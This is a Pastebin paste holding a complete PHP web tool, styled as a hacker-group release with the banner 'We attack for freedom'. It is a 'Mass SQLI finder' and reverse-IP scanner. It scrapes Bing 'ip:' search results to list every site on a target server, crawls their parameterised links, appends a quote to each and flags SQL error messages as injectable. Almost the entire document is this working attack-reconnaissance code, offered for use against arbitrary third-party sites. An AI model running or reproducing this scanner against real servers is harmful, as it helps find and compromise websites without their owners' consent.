API tools faq
paste
Advertisement
l3mot

Silent poison Bing-Google Rever

l3mot
Mar 31st, 2017
37
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 13.06 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2.  
  3.  
  4. $head = '
  5. <html>
  6. <head>
  7. </script>
  8. <title>--==[[ Silent poison Bing-Google Reverse Ip-Domain Scanner By Thừa Lâm]]==--</title>
  9. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  10.  
  11.  
  12. <STYLE>
  13. body {
  14. background-image: url("http://totallyrelatable.com/wp-content/uploads/2014/01/hardwood-background-tileblack-wood-background-home-improvement-yasmd2ot.jpg");
  15. background-position: center center;
  16. background-repeat: no-repeat;
  17. background-size: 1000px 500px;
  18. background-color: #000000;
  19. background-attachment: fixed;
  20. font-family: Tahoma
  21. }
  22. tr {
  23. BORDER: dashed 1px #333;
  24. color: #FFF;
  25. }
  26. td {
  27. BORDER: dashed 1px #333;
  28. color: #FFF;
  29. }
  30. .table1 {
  31. BORDER: 0px Black;
  32. BACKGROUND-COLOR: Black;
  33. color: #FFF;
  34. }
  35. .td1 {
  36. BORDER: 0px;
  37. BORDER-COLOR: #333333;
  38. font: 7pt Verdana;
  39. color: Green;
  40. }
  41. .tr1 {
  42. BORDER: 0px;
  43. BORDER-COLOR: #333333;
  44. color: #FFF;
  45. }
  46. table {
  47. BORDER: dashed 1px #333;
  48. BORDER-COLOR: #333333;
  49. BACKGROUND-COLOR: Black;
  50. color: #FFF;
  51. }
  52. input {
  53. border : solid 2px;
  54. border-color : #333;
  55. BACKGROUND-COLOR: white;
  56. font: 10pt comic sans ms;
  57. color: black;
  58. }
  59. select {
  60. BORDER-RIGHT: Black 2px solid;
  61. BORDER-TOP: #DF0000 1px solid;
  62. BORDER-LEFT: #DF0000 1px solid;
  63. BORDER-BOTTOM: Black 1px solid;
  64. BORDER-color: #FFF;
  65. BACKGROUND-COLOR: Black;
  66. font: 8pt Verdana;
  67. color: Red;
  68. }
  69. submit {
  70. BORDER: buttonhighlight 2px outset;
  71. BACKGROUND-COLOR: Black;
  72. width: 40%;
  73. color: white;
  74. }
  75. textarea {
  76. border : dashed 2px #333;
  77. BACKGROUND-COLOR: Black;
  78. font: Fixedsys bold;
  79. color: #999;
  80. }
  81. BODY {
  82. SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #FFF; SCROLLBAR-SHADOW-color: #FFF; SCROLLBAR-3DLIGHT-color: #FFF; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #FFF; SCROLLBAR-DARKSHADOW-color: #FFF
  83. margin: 1px;
  84. color: Red;
  85. background-color: Black;
  86. }
  87. .main {
  88. margin : -287px 0px 0px -490px;
  89. BORDER: dashed 1px #333;
  90. BORDER-COLOR: #333333;
  91. }
  92. .tt {
  93. background-color: Black;
  94. }
  95.  
  96. A:link {
  97. COLOR: White; TEXT-DECORATION: none
  98. }
  99. A:visited {
  100. COLOR: White; TEXT-DECORATION: none
  101. }
  102. A:hover {
  103. color: Red; TEXT-DECORATION: none
  104. }
  105. A:active {
  106. color: Red; TEXT-DECORATION: none
  107. }
  108. </STYLE>
  109. <script language=\'javascript\'>
  110. function hide_div(id)
  111. {
  112. document.getElementById(id).style.display = \'none\';
  113. document.cookie=id+\'=0;\';
  114. }
  115. function show_div(id)
  116. {
  117. document.getElementById(id).style.display = \'block\';
  118. document.cookie=id+\'=1;\';
  119. }
  120. function change_divst(id)
  121. {
  122. if (document.getElementById(id).style.display == \'none\')
  123. show_div(id);
  124. else
  125. hide_div(id);
  126. }
  127. </script>'; ?>
  128. <html>
  129. <head>
  130. <?php
  131. echo $head ;
  132. echo '
  133.  
  134. <table width="100%" cellspacing="0" cellpadding="0" class="tb1" >
  135.  
  136.  
  137.  
  138. <td width="100%" align=center valign="top" rowspan="1"><font color=#white size=5 face="comic sans ms"><b>--==[[ SQLi Scanner Tool ]]==--</font><br>
  139. <font color=white size=5 face="comic sans ms"><b>--==[[ Bing-Google Reverse IP</font><font color=white size=5 face="comic sans ms"><b> Domain lookup Scanner by</font><font color=white size=5 face="comic sans ms"><b> Thừa Lâm ]]==--</font> <div class="hedr">
  140.  
  141. <td height="10" align="left" class="td1"></td></tr><tr><td
  142. width="100%" align="center" valign="top" rowspan="1"><font
  143. color="white" face="comic sans ms"size="1"><b>
  144. <font color=#white>
  145. ################################################</font><font color=white>################################################</font><font color=white>################################################</font><br><font color=white>-==[[Thanks to]]==--</font><font color=white>Ghost Team-Hacking and Security ,Madleets Team,PhanTom Hacker,Indishell,MA Hacking-Sec<br>
  146. <font color=white>--==[[Interface Desgined By]]==--</font><br><font color=white>Thừa Lâm</font><br><font color=#White>
  147. ################################################</font><font color=white>#################################################</font><font color=white>################################################</font>
  148.  
  149. </table>
  150. </table> <div align=center><font color=white font size=5><marquee behavior="scroll" direction="left" scrollamount="2" scrolldelay="30" width="70%"><span class="footerlink">We are Vietnamese Soilder ....We attack for freedom</span></marquee><br></font></div><div align=center><font size=4 color=white face="comic sans ms">--==[[ Code for Checkers,Testers,Hackers and Pentester ]]==--</font><p>
  151.  
  152. ';
  153.  
  154. ?>
  155.  
  156.  
  157.  
  158. <body bgcolor=black><div align=center><font color=white size=3 face="comic sans ms">
  159. <form method=post>
  160. <font color=white font size=5>--==[[<input type=submit name=hosted value="Reverse IP(Websites on server)">||>>++++<<||
  161. <input type=submit name=sql value="Bing based SQL Injection Finder">||>>++++<<||<input type=submit name=scan value="Mass SQLI finder">]]==--</font><font size=4><p>
  162. >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>|||||<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<</font><p>
  163. </form>
  164.  
  165. <?php
  166. error_reporting(0);
  167. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien)
  168. {
  169. $ar0=explode($marqueurDebutLien, $text);
  170. $ar1=explode($marqueurFinLien, $ar0[1]);
  171. $ar=trim($ar1[0]);
  172. return $ar;
  173. }
  174.  
  175.  
  176. function getHost($Address)
  177. {
  178. $parseUrl = parse_url(trim($Address));
  179. return trim($parseUrl[host] ? $parseUrl[host] : array_shift(explode('/', $parseUrl[path], 2)));
  180. }
  181.  
  182. function sql($tu)
  183. {
  184. $ch = curl_init();
  185. $url=str_replace("=","='",$tu)."<br>";
  186. curl_setopt($ch, CURLOPT_URL, $url);
  187. curl_setopt($ch, CURLOPT_HEADER, 1);
  188. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  189. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  190. $content=$result['EXE'] = curl_exec($ch);
  191.  
  192. if(preg_match("/You have an error in your SQL syntax|mysql_fetch_array()|execute query|mysql_fetch_object()|mysql_num_rows()|mysql_fetch_assoc()|mysql_fetch_row()|SELECT * FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error/i",$content))
  193. {
  194. echo "<div align=center><table width=90% border=1 ><tr><td align=center><font color=red size=4 face='comic sans ms'> i got sql injection symtoms in website <font color=white size=4 face='comic sans ms'> $tu </font> </font></td></tr></table>";
  195. }
  196. else
  197. {
  198. echo "<br>bhai ji check link manually for vulnerability existance :( <br>";
  199. }
  200. }
  201.  
  202.  
  203.  
  204. function e($i,$q,$p)
  205. {
  206. $ch = curl_init();
  207. curl_setopt($ch, CURLOPT_URL, 'http://www.bing.com/search?q=ip%3A' .$i . '+'.$q.'&go=&qs=n&first=' . $p.'0&FORM=PERE');
  208. curl_setopt($ch, CURLOPT_HEADER, 1);
  209. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  210. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  211. curl_setopt($ch, CURLOPT_REFERER, 'http://www.bing.com');
  212. curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');
  213. return $result['EXE'] = curl_exec($ch);
  214. curl_close($ch);
  215. }
  216.  
  217. ?>
  218.  
  219.  
  220. <?php
  221. if(isset($_POST['scan']))
  222. {
  223. ?>
  224. <form method=post><font color=white size=4 face="comic sans ms">
  225. Target server Ip/Website: <br>||<br>\/<br><input type=text name=serverip value=127.0.0.0> <p>
  226. <input type=submit name=billu value="extract domains for scanning"><p>
  227. </form>
  228. <?php
  229. }
  230. ?>
  231.  
  232. <?php
  233. error_reporting(0);
  234. if(isset($_POST['billu']))
  235. {
  236. $iw=$_POST['serverip'];
  237. $rr=ereg_replace("(https?)://", "", $iw);
  238. $web= ereg_replace("www.", "", $rr);
  239. echo "<font color=white>Server Ip is ".gethostbyname($web)."</font>";
  240. $server=gethostbyname($web);
  241.  
  242. echo "</font><br>###############################################<br>";
  243. echo "<font size=4 color=white>List of Hosted Website is Given Below...... </font><br>";
  244. $var=0;
  245. $alllinks=array();
  246.  
  247. do
  248. {
  249. $pgs=$var;
  250. $link="http://www.bing.com/search?q=ip%3A" .$server . "&go=&qs=n&first=" . $pgs."0&FORM=PERE";
  251. $uurl=file_get_contents($link);
  252. if($uurl && preg_match('/\">Next<\/a><\/li>/i',$uurl))
  253. {
  254. //echo "next page link exist";
  255. $r=1;
  256. $pdata=e($server,$qu,$pgs);
  257. if(preg_match_all('(<div class="sb_tlst">.*<h3>.*<a href="(.*)".*>(.*)</a>.*</h3>.*</div>)siU', $pdata,$i, PREG_SET_ORDER))
  258. {
  259.  
  260. foreach($i as $match)
  261. {
  262. $total=$match[0]."\n" ;
  263. $domain=entre2v2($total,"a href=\"","\" h=\"ID=");
  264. $URL=gethost($domain);
  265. $li=ereg_replace("www.", "", $URL);
  266. //echo $li."\n";
  267. array_push($alllinks,$li);
  268. }
  269. }
  270. }
  271. else{
  272.  
  273. $r=0;
  274. }
  275. $var++;
  276.  
  277. }while($r!='0');
  278. $lastarray=array_unique($alllinks);
  279. echo "<form method=post>";
  280. echo "<textarea rows=10 cols=50 name=a>";
  281. foreach($lastarray as $sw){
  282. echo $sw."\n";
  283. }
  284. echo "</textarea>";
  285. echo "<p><input type=submit name=msqli value=\"Start SQLI scanning\"></form>";
  286. }
  287. ?>
  288.  
  289. <?php
  290. if(isset($_POST['msqli']))
  291. {
  292. $a=explode("\n",$_POST['a']);
  293.  
  294. foreach($a as $sa)
  295. {
  296. echo $URL=trim($sa);
  297. $ch = curl_init();
  298. curl_setopt($ch, CURLOPT_URL,$URL );
  299. curl_setopt($ch, CURLOPT_HEADER, 1);
  300. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  301. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  302. curl_setopt($ch, CURLOPT_REFERER, 'http://www.bing.com/');
  303. curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');
  304. $result['EXE'] = curl_exec($ch);
  305. $result['ERR'] = curl_error($ch);
  306. curl_close($ch);
  307.  
  308. if ( empty( $result['ERR'] ) )
  309. {
  310.  
  311. if(preg_match_all('/<a\s+href=["\']([^"\']+)["\']/i', $result['EXE'],$i, PREG_SET_ORDER))
  312. {
  313. foreach($i as $match)
  314. {
  315. $text1=$match[1] ."<br>";
  316.  
  317. echo $domain=getHost($URL)."/".$text1;
  318. if(preg_match("/=/i",$domain))
  319. {
  320. sql($domain);
  321. }
  322. else {
  323. echo "<br><font color=white> Link don't have dynamic parameter<br>";
  324. }
  325.  
  326.  
  327.  
  328. }}}
  329.  
  330. }
  331.  
  332. }
  333. ?>
  334.  
  335. <?php
  336. if(isset($_POST['hosted']))
  337. {
  338. ?>
  339. <form method=post>
  340. <font size=4>Website/Ip</font> <br>||<br>\/<br> <input type=text name=ip >
  341. <p><input type=submit name=s value="Extract Hosted Websites"></form>
  342. <?php
  343. }
  344. ?>
  345.  
  346.  
  347. <?php
  348. set_time_limit(0);
  349. error_reporting(0);
  350.  
  351. if(isset($_POST['s']))
  352. {
  353. $iw=$_POST['ip'];
  354. $rr=ereg_replace("(https?)://", "", $iw);
  355. $web= ereg_replace("www.", "", $rr);
  356. echo "<font color=white>Server Ip is ".gethostbyname($web)."</font>";
  357. $server=gethostbyname($web);
  358.  
  359. echo "</font><br>###############################################<br>";
  360. echo "<font size=4 color=white>List of Hosted Website is Given Below...... </font><br>";
  361. $var=0;
  362.  
  363. do
  364. {
  365. $pgs=$var;
  366. $link="http://www.bing.com/search?q=ip%3A" .$server . "&go=&qs=n&first=" . $pgs."0&FORM=PERE";
  367. $uurl=file_get_contents($link);
  368. if($uurl && preg_match('/\">Next<\/a><\/li>/i',$uurl))
  369. {
  370. //echo "next page link exist";
  371. $r=1;
  372. $pdata=e($server,$qu,$pgs);
  373.  
  374. if(preg_match_all('(<div class="sb_tlst">.*<h3>.*<a href="(.*)".*>(.*)</a>.*</h3>.*</div>)siU', $pdata,$i, PREG_SET_ORDER))
  375. {
  376. foreach($i as $match)
  377. {
  378. $total=$match[0]."\n" ;
  379. $domain=entre2v2($total,"a href=\"","\" h=\"ID=");
  380. $URL=gethost($domain);
  381. echo "<br><a href=http://".$URL.">".$URL."</a>";
  382. }}
  383. }
  384. else{
  385.  
  386. $r=0;
  387. }
  388. $var++;
  389.  
  390. }while($r!='0');
  391. }
  392. ?>
  393.  
  394.  
  395.  
  396. <?php
  397. if(isset($_POST['sql']))
  398. {
  399. ?>
  400.  
  401. <form method=post><font color=white size=4 face="comic sans ms">
  402. Target server ip/website: <input type=text name=ip value=127.0.0.0> &nbsp
  403. <font color=white size=4 face="comic sans ms"><p>
  404. Url ==><input type=text name=query value=.php?><p>
  405. <input type=submit name=ssm value="Enter">
  406. </form>
  407. <?php
  408. }
  409. ?>
  410.  
  411. <?php
  412. error_reporting(0);
  413. set_time_limit(0);
  414.  
  415. if(isset($_POST['ssm']))
  416. {
  417. $wi=$_POST['ip'];
  418. $rr=ereg_replace("(https?)://", "",$wi);
  419. $server= ereg_replace("www.", "", $rr);
  420. echo "<font size=4>Server Under Scaning ==> ". $sr=gethostbyname($server);
  421. echo "&nbsp &nbspquery ==> ".$qu=trim($_POST['query']);
  422.  
  423. echo "</font><br>=====================================================================<br>";
  424.  
  425. $var=0;
  426.  
  427. do
  428. {
  429. $pgs=$var;
  430. $link="http://www.bing.com/search?q=ip%3A".$sr . "+".$qu."&go=&qs=n&first=" . $pgs."0&FORM=PERE";
  431. $uurl=file_get_contents($link);
  432. if($uurl && preg_match('/\">Next<\/a><\/li>/i',$uurl))
  433. {
  434. //echo "next page link exist";
  435. $r=1;
  436. $pdata=e($sr,$qu,$pgs);
  437.  
  438. if(preg_match_all('(<div class="sb_tlst">.*<h3>.*<a href="(.*)".*>(.*)</a>.*</h3>.*</div>)siU', $pdata,$i, PREG_SET_ORDER)) {
  439. foreach($i as $match) {
  440. $total=$match[0]."\n" ;
  441. $domain=entre2v2($total,"a href=\"","\" h=\"ID=");
  442. echo "<br><font color=red size=4><b>testing link </b></font>".$domain;
  443.  
  444. if(preg_match("/=/i",$domain))
  445. {
  446. sql($domain);
  447. }
  448. else {
  449. echo "<br><font color=white> link dont have dynamic parameter<br>";
  450. }
  451.  
  452. }
  453. }
  454. }
  455.  
  456. else{
  457. $r=0;
  458. }
  459. $var++;
  460.  
  461. }while($r!='0');
  462.  
  463.  
  464. }
  465. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!